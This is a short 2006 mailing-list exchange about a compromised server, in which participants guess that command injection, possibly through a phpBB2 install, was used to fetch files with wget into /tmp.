On Wed, Jan 04, 2006 at 04:07:21PM +0000, Gaby vanhegan wrote:
> On 4 Jan 2006, at 15:51, Pete Vickers wrote:
> > Is there some attack vector like php or such available on the
> > machine ? maybe they used that to retrieve & write the file?
>
> The messages in the log file indicate that they used some command
> injection in a script to call wget and download the files into /tmp.
> I'm fairly sure it was via a bad script, and I'm trying to locate
> which script was used, so far with no success.
There was a phpBB2 in one of the paths used. If you have phpBB enabled
somewhere, that's a likely attack vector.
Joachim
